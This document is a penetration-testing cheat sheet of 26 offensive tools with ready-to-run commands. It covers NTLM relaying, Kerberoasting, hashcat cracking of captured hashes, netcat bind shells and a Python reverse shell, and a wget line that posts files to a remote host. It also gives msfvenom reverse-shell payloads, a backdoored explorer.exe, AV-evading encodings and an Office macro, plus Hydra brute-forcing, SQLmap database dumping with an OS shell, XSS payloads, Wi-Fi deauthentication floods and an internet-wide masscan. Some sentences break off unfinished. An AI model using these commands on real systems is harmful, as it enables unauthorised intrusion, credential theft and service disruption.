Reference List
    1. CrackMapExec
    2. Responder
    3. ntlmrelayx
    4. GPP-Decrypt
    5. GetUserSPNs
    6. HashCat64
    7. HashCat
    8. NetCat
    9. Veil-Framework
    10. Mentalist
    11. CUPP
    12. Skipfish
    13. Grabber
    14. Httrack
    15. Wafw00f
    16. Hydra
    17. pw-Inspector
    18. MACof
    19. Sublist3r
    20. Nessus
    21. XSSer
    22. SQLmap
    23. DirBuster
    24. MDK3
    25. Sherlock
    26. MasScan

CrackMapExec – is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. It automates the hit and miss when trying to login to several computers in the network [Link].

sudo apt-get install crackmapexec -y

If you already have credentials:

crackmapexec smb 10.0.0.0/24 -u Administrator -p 'Pa$$w0rd1!' -d WORKGROUP

If you only have the hash:

crackmapexec smb 10.0.0.0/24 -u Administrator -H asd3b4...89c0

Replace ‘asd3b4…89c0‘ by long hash you’ve got.


Responder – Exploits SMB vulnerabilities [Link] and deprecated at [Link].

locate Responder.py
cd /usr/share/responder/
python Responder.py -I eth0 -rdw -v

ntlmrelayx – it relays the received NTLM hash to a target IP that is inside the file target.txt to get access to SMD shared using somebody else’s credentials.

locate ntlmrelayx.py
cd /opt/impacket/examples
python ntlmrelayx.py -tf target.txt -smb2support

GPP-Decrypt – Decrypts GPP passwords.

gpp-decrypt edBS...lVmQ

Replace the ‘edBS…lVmQ’ by the


GetUserSPNs – as part of Kerberoast attack it finds Service Principal Names that are associated with a normal user account, this could be used for an offline brute-forcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs [Link].

pythin GetUserSPNs.py Domain/User -dc-ip 10.0.0.1 -request

Password: *******

HashCat64 – powerful brute force hash cracker, such as the hash acquired from the GetUserSPNs above or another source [Link].

hashcat64.exe --help
hashcat64.exe -m 13100 kerberoast.txt rockyou.txt

HashCat – Password cracker [Link].

sudo apt install hashcat
hashcat -m 5600 hash.txt rockyou.txt
hashcat -m 5600 hash.txt rockyou.txt --force
hashcat -I
hashcat -d 1,2 -m 2500 -w 3 --status -a 6 wpa2_handshake.hccapx wordlist.txt
hashcat jwt.txt -m 16500 -a 0 rockyou.txt -r OneRuleToRuleThemAll.rule

Note that the hash captured with the Responder was copied to the hash.txt file and the mode 5600 used is for NetNTLMv2. Check the module compatible with the type of hash you are working on with –help. The last thing is the password’s list given rockyou.txt, you can also use another popular list called BreachParse.

After, in the fourth line, it gets the list of CPUs and GPUs with the attribute -I and inform that wants to use the computing devices 1 and 2, then define module 2500 for WPA/WPA2, and performance 3 (1-4), and other parameters.

Get the OneRuleToRuleThemAll from [Link].


NetCat – NC is a tool that makes it easy to create over the network a series of functionalities such as chat, file transfer, remote shell, portscan, and more [Link].

Server Side (Listener):

nc -nvlp 8080
nc -n -v -l -p 5555 -e /bin/bash
nc -n -v -l -p 5555 -e cmd.exe
nc -l -p 1234 > receive.file

Client-Side:

nc -nv 10.0.0.1 5555
nc -zv domain.com 80-88
nc -w 3 10.0.0.1 1234 < send.file

Also can be accessed by other tools such as:

wget --post-file=file.txt 10.0.0.1 8080
/bin/bash -c '(while ! nc -z -v -w1 localhost 22 2>/dev/null; do echo "Waiting for port 22 to open ..."; sleep 2; done); sleep 2'

Getting a reverse shell with Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Veil-Framework – a tool designed to generate Metasploit payloads that bypass common anti-virus solutions [Link].

git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

msfVenom – it is a framework to create and encrypt payloads. Note for EXITFUNC: thread (clean exit), process (restarts it on exit), seh (restart the process when an error occurs).

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"

The first example above creates a payload and uses arguments to define file type ‘c‘, architecture 32 bits, and also sends a bad character ‘\x00‘. There is no output file, so all the assembly code will be printed on the screen to be copied.

msfvenom -p windows/x64/meterpreter/reverse_http EXITFUNC=thread LPORT=4444 LHOST=10.0.0.1 -f raw -o payload.bin --smallest

In the example above the payload is set to the format ‘raw‘, the output file is defined as ‘payload.bin‘, and will try to create the smallest shellcode possible.

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python -n 26

The command above creates a payload with ‘3‘ iterations of the ‘shikata_ga_nai‘ encoder without any null bytes and in ‘python‘, and add ‘26‘ NOPs at the beginning of the file.

msfvenom -a x86 --platform windows -x explorer.exe -k -p windows/shell/bind_tcp lhost=10.0.0.1 -b "\x00" -f exe -o explorer_backdoor.exe

The preview command input the existent ‘explorer.exe‘ and with the argument ‘-k‘ specifies that the payload will run in a separate thread. It outputs the new file ‘explorer_backdoor.exe‘ with the appended payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -f exe > shell.exe

On the example above it just create a Meterpreter reverse shell file type exe but instead of passing the IP it leaves to the msfvenom to get what is the IP associated with the interface eth0.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=53 -f vba -o macro.vba

The last example creates a macro to be run at Microsoft Office tools.


Mentalist – creates passwords list using sets of rules and can also import preview list such as CUPP’s output [Link].

mentalist

CUPP – the Common User Passwords Profiler creates a list of possible passwords based on given information such as giver names, last names, nicknames, birthdates… about the victim and its significant people [Link].

sudo python cupp.py -i

Skipfish – a website spider/crawler that can also test for various vulnerable parameters and configurations.

skipfish -YO -o ~/Desktop/folder http://192.168.x.x

Grabber – spider/crawler canner and test for SQLi (SQL Injection) and XXS (Cross-Site Scripting).

grabber --spider 1 --sql --xss --url http://example.com

Httrack – download recursively the website creating a local mirror.

httrack http://example.com –O ~/Desktop/file

Note: this functionality can also be done with wget as follows. The default depth is 5 and the example sets as 10:

wget -r -l 10 http://example.com

Wafw00f – detect the presence of a Web App Firewall.

wafw00f http://example.com

Hydra – A brute-force login cracker that supports numerous protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP [Link]

hydra -l userName -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 5 10.0.0.1 ssh
hydra -L users.lst -P /usr/share/wordlists/rockyou.txt ftp://10.0.0.1
hydra -L usernames.txt -P passwords.txt 10.0.0.1 http-post-form '/login.php:username=^USER^&password=^PASS^:F=incorrect' -v

The first example above try to guess the password for ‘user‘ using one of the Metasploit’s passwords list (unix_passwords.txt), with 5 threads over SSH.

The second example will try to login on a webpage


pw-Inspector – Used to filter the passwords in a word list to meet length criteria (from 6 to 10 characters on the following example).

pw-inspector -i whole_wordlist.txt -o filtered_list.txt -m 6 -M 10

MACof – Used to flood a switch with random MAC addresses.

macof
macof -n 100
macof -i eth0 -d 192.168.1.1 -y 80

Sublist3r – Tool designed to enumerate (passively) subdomains of websites using OSINT [Link].

sublist3r -d example.com -t 5 -e bing

Nessus – A powerful professional scan [Link].

sudo systemctl start nessusd.service
https://localhost:8834/

XSSer – an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications.

sudo apt install xsser
xsser --gtk

xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret"
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" --auto
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" -Fp "<script>alert('vulnerable!')</script>"
xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret"
xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret" -Fp "<script>alert('vulnerable!')</script>"

Replace the content of the variable by XSS to inform XSSer where it should inject the payloads.


SQLmap – automates the process of detecting and exploiting SQL injection flaws and taking over database servers [Link].

sudo apt install sqlmap
python sqlmap.py --help
sqlmap -u "https://example.com/search.php?q="
sqlmap -u "https://example.com/search.php?q=" --level=5 --risk=3
sqlmap -u "https://example.com/search.php?q=" --dbs --all --threads=10
sqlmap --url="https://example.com/login.php" --data="user=test&password=test"
sqlmap -u "https://example.com/search.php?q=" --batch --banner
sqlmap -u "https://example.com/search.php?q=" --batch --passwords
sqlmap -u "https://example.com/search.php?q=" --batch --dbs
sqlmap -u "https://example.com/search.php?q=" --batch --tables -D dbName
sqlmap -u "https://example.com/search.php?q=" --batch --dump -T tableName -D dbName
sqlmap -u "https://example.com/search.php?q=" --batch --os-shell

Note the level (1-5) and risk (1-3) of tests to perform, dbs for extracting the database names, all for retrieving everything, and threads (1-10) to speed up the attack. In the last example data provides the POST variables.


DirBuster – designed to brute force directories and files names on web/application servers.

dirb https://example.com/
dirb https://example.com/ wordslist.txt

OR

# also available with GUI

MDK3 – exploits common wifi weaknesses, such as brute-force to reveal hidden SSID, beacon flood, authentication DoS, deauthentication, WPA downgrade, cancel all traffic continuously, stress test, and more.

sudo apt install mdk3
sudo mdk3 wlan0mon a
sudo mdk3 wlan0mon d -c 6 -b mac_list.txt
sudo mdk3 wlan0mon p -t 00:00:00:00:00:00 -f ssid_list.txt

Note: on the third line it is flooding channel 6 with beacon messages using the mac_list.txt file to unauthenticated the users. On the fourth line replace 00:00:00:00:00:00 with the MAC of the access point running the hidden SSID and ssid_list.txt with list file for brute-forcing.


Sherlock – Gathering Open Source Intelligence (OSINT) tool. Finds if someone based on its username has a social network account with that username [Link].

sudo apt install sherlock
sherlock --tomeout 1 username

MasScan – A mass scanner powerful enogth to scan the whole Internet. Be prudent while using this tool, scan unauthorized networks is a crime [Link].

masscan 0.0.0.0/0 --port 12345 --rate 1000000 -oX output.txt --exclude private_netowrks.txt

The output.txt will be in XML format and the exclude attribute will prevent to try scanning non-public network ranges. See the private_netowrks.txt:

10.0.0.0/8
172.16.0.0/12
192.168.0.0/16